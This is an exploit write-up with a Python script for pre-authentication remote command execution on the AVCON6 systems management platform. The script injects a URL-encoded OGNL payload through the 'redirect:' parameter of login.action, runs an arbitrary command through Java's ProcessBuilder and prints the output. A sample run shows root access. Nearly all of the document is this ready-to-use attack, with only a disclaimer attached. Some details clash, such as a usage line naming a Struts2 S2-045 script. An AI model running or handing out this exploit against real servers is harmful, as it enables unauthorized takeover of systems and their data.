AVCON6 Systems Management Platform suffers from a remote root command execution vulnerability.
1dd0d5b962a6b8f0b0dc6267e2fc5ca01c3e4382c0782267388eb383cd70e571
# Exploit Title: AVCON6 systems management platform - OGNL - Remote root command execution
# Date: 10/09/2018
# Exploit Author: Nassim Asrir
# Contact: wassline@gmail.com | https://www.linkedin.com/in/nassim-asrir-b73a57122/
# CVE: N\A
# Tested On: Windows 10(64bit) / 61.0b12 (64-bit)
# Thanks to: Otmane Aarab
# Example below:
# python ./rce.py https://server:8080/ id
# Testing Target: https://server:8080/
# uid=0(root) gid=0(root)
# Vendor: https://www.epross.com/
# About the product: The AVCON6 video conferencing system is the most complete set of systems, including multi-screen multi-split screens and systems that are integrated with H323/SIP protocol devices. High-end video conferencing
# software ideal for Room Base environments and performance requirements. Multi-party video conferencing can connect thousands of people at the same time.
# I am not responsible for any wrong use.
######################################################################################################
#!/usr/bin/python
# -*- coding: utf-8 -*-
import urllib2
import httplib
def exploit(url, cmd):
payload = 'login.action?redirect:'
payload += '${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{%22'+cmd+'%22})).'
payload += 'start(),%23b%3d%23a.getInputStream(),'
payload += '%23c%3dnew%20java.io.InputStreamReader(%23b),'
payload += '%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d'
payload += '.read(%23e),%23matt%3d%23context.'
payload += 'get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),'
payload += '%23matt.getWriter().println(%23e),%23matt.'
payload += 'getWriter().flush(),%23matt.getWriter()'
payload += '.close()}'
try:
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0'}
request = urllib2.Request(url+payload, headers=headers)
page = urllib2.urlopen(request).read()
except httplib.IncompleteRead, e:
page = e.partial
print(page)
return page
if __name__ == '__main__':
import sys
if len(sys.argv) != 3:
print("[*] struts2_S2-045.py https://target/ id")
else:
print('[*] Avcon6-Preauh-Remote Command Execution')
url = sys.argv[1]
cmd = sys.argv[2]
print("[*] Executed Command: %s\n" % cmd)
print("[*] Target: %s\n" % url)
exploit(url, cmd)